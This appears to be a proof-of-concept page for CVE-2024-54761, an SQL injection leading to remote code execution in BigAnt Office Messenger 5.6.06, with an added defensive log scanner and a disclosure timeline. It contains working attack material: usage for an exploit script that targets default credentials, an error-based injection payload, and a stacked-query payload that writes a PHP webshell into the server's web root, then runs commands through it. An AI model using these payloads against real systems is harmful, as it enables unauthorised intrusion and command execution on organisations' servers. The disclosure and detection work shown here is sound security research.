
CVE-2024-54761 PoC — BigAntSoft BigAnt office messenger security vulnerability

Associated Vulnerability
Title: BigAntSoft BigAnt office messenger security vulnerability (CVE-2024-54761)
Description: BigAntSoft BigAnt office messenger is a server/client instant messaging program for enterprise environments from the Australian company BigAntSoft. Version 5.6.06 of BigAntSoft BigAnt office messenger contains a security vulnerability. An attacker can exploit it to perform SQL injection via the "dev_code" parameter.
Description: CVE-2024-54761 PoC
Readme
# BigAnt Office Messenger 5.6.06 RCE via SQL Injection
An SQL injection vulnerability in BigAnt Messenger 5.6.06 leads to remote code execution (RCE). The steps below reproduce the issue.


Usage:
```
CVE-2024-54761.py [-h] -r RHOST [-p RPORT] [-u USERNAME] [-P PASSWORD]
options:
  -h, --help            show this help message and exit
  -r, --rhost RHOST     Target IP address
  -p, --rport RPORT     Target port (default 8000)
  -u, --username USERNAME
                        Login username (default admin)
  -P, --password PASSWORD
                        Login password in plain text
```
Run the exploit against a target that still uses the default credentials:
```
python CVE-2024-54761.py -r 127.0.0.1
```
<img width="643" height="241" alt="exploit" src="https://github.com/user-attachments/assets/7219f1bc-415c-4f7f-be8e-bd4bf690e0e6" />







# Manual exploit
Extract the database version through the `dev_code` parameter, which is exposed to SQL injection.
```
# Payload
?dev_code=AND EXTARCTVALUE(rand(),concat(CHAR(126),version(),CHAR(126)))--
```
![SQLI version](https://github.com/user-attachments/assets/109a800c-af76-4a0b-9b42-0f03d0a9acbe)
Write a PHP webshell into the web root of the target using stacked SQL queries.
```
# Payload
?dev_code=;SELECT "<?php system($GET['cmd']); ?>" INTO OUTFILE 'C:/Program Files (x86)/BigAntSoft/IM Console/im_webserver/htdocs/shell.php'-- -
```
![create webshell 1](https://github.com/user-attachments/assets/258f0ae0-8c8e-4b09-b454-fcd4339d877c)
Proof of command execution:
```
/shell.php?cmd=whoami
```

![whoami](https://github.com/user-attachments/assets/94c2bf8e-6ba3-4329-aeaa-44215f88fed0)
![command dir](https://github.com/user-attachments/assets/07320b55-01c7-4e34-8d26-4b3a0d62d817)
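As an added, defender-side example (not part of the PoC or of BigAntSoft's code), the following scanner flags requests whose `dev_code` parameter carries the SQL injection markers used above and requests to a `.php` file with a `cmd` parameter, the webshell pattern from the PoC. The combined-log layout, the `/index.php` endpoint and the sample lines are constructed assumptions.

```python
"""Flag CVE-2024-54761-style requests in web-server access logs.
Added example, not part of the PoC; log format and samples are assumed."""
import re
from urllib.parse import parse_qs, urlsplit

# Markers drawn from the payload shapes shown above (stacked query,
# INTO OUTFILE file write, error-based EXTRACTVALUE, trailing comment).
MARKER_RE = re.compile(
    r";\s*select\b|\binto\s+(?:out|dump)file\b|\bextractvalue\s*\("
    r"|\bunion\s+select\b|--\s*-?\s*$",
    re.IGNORECASE,
)
# Assumed Apache/nginx combined-log layout.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

def inspect_request(path):
    """Return findings for one request path; empty list when clean."""
    findings = []
    parts = urlsplit(path)
    query = parse_qs(parts.query, keep_blank_values=True)  # URL-decodes values
    for value in query.get("dev_code", []):
        if MARKER_RE.search(value):
            findings.append(f"sqli marker in dev_code: {value[:60]!r}")
    # A .php file called with a cmd parameter is the webshell pattern from the PoC.
    if parts.path.lower().endswith(".php") and "cmd" in query:
        findings.append(f"possible webshell invocation: {parts.path}")
    return findings

def scan_log(lines):
    """Return (ip, path, finding) tuples for every suspicious log line."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            alerts.extend((m["ip"], m["path"], f) for f in inspect_request(m["path"]))
    return alerts

# Constructed sample lines, not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Nov/2024:10:00:00 +0000] "GET /index.php?dev_code=A1B2C3 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Nov/2024:10:01:00 +0000] "GET /index.php?dev_code=AND+EXTRACTVALUE(rand(),version())-- HTTP/1.1" 500 77',
    '10.0.0.9 - - [01/Nov/2024:10:02:00 +0000] "GET /index.php?dev_code=%3BSELECT+%22x%22+INTO+OUTFILE+%27C%3A%2Fshell.php%27--+- HTTP/1.1" 200 12',
    '10.0.0.9 - - [01/Nov/2024:10:03:00 +0000] "GET /shell.php?cmd=whoami HTTP/1.1" 200 40',
]

if __name__ == "__main__":
    for ip, path, finding in scan_log(SAMPLE_LOG):
        print(f"{ip} {finding} ({path})")
```

The same markers can be applied at the WAF or reverse proxy in front of port 8000, and a new `.php` file appearing under `im_webserver/htdocs` is worth an alert on its own.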
# Timeline
31-10-2024: Submitted vulnerabilities to vendor via email

31-10-2024: Emailed vendor, no response

15-11-2024: Emailed vendor, no response

15-11-2024: Requested CVEs
# Reference
https://gist.github.com/nscan9/a31982c90ab40a8e00373bf15efbf52a   
https://www.bigantsoft.com
File Snapshot

```
[4.0K] /data/pocs/0eda5a43b50960070676c1fd731e5e72864dad56
├── [5.6K] CVE-2024-54761.py
└── [1.9K] README.md

0 directories, 2 files
```